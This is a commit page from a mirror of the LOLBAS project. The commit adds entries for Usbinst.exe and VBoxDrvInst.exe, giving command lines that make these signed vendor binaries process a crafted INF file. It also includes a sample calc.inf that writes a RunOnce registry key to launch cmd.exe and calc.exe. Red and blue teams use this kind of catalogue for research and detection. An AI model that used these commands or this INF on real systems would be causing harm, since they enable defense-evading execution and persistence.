infosecn1nja
/
LOLBAS
mirror of https://github.com/infosecn1nja/LOLBAS.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #14 from giMini/master 

VBoxDrvInst.exe added
master
Oddvar Moe 2018-05-08 00:30:07 +02:00 committed by GitHub
parent 04ca314eb6 de7c269e12
commit 726e0455ea
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 95 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
LOLBins.md
View File

@ -91,6 +91,6 @@ If you are missing from the acknowledgement, please let me know (I did not forge
# OTHER NON MICROSOFT BINARIES # OTHER NON MICROSOFT BINARIES
[Nvuhda6.exe](OtherBinaries/Nvuhda6.md) [Nvuhda6.exe](OtherBinaries/Nvuhda6.md)
[Nvudisp.exe](OtherBinaries/Nvudisp.md) [Nvudisp.exe](OtherBinaries/Nvudisp.md)
[VBoxDrvInst.exe](OtherBinaries/VBoxDrvInst.md)
[Usbinst.exe](OtherBinaries/Usbinst.md)

48
OtherBinaries/Usbinst.md Normal file
View File

@ -0,0 +1,48 @@
## Usbinst.exe
* Functions: Execute
```
Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
```
Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken
Resources:
* https://twitter.com/pabraeken/status/993514357807108096
Full path:
```
C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
```
Notes:
calc.inf
```
; DRIVER.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
AddReg = CalcStart
[CalcStart]
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
```

45
OtherBinaries/VBoxDrvInst.md Normal file
View File

@ -0,0 +1,45 @@
## VBoxDrvInst.exe
* Functions: Persistence
```
VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
```
Acknowledgements:
* Pierre-Alexandre Braeken - @pabraeken
Code sample:
*
Resources:
* https://twitter.com/pabraeken/status/993497996179492864
Full path:
```
C:\Program Files\Oracle\VirtualBox Guest Additions
```
Notes:
calc.inf
```
; DRIVER.INF
; Copyright (c) Microsoft Corporation. All rights reserved.
[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
[DestinationDirs]
DefaultDestDir = 1
[DefaultInstall]
AddReg = CalcStart
[CalcStart]
HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe"""
```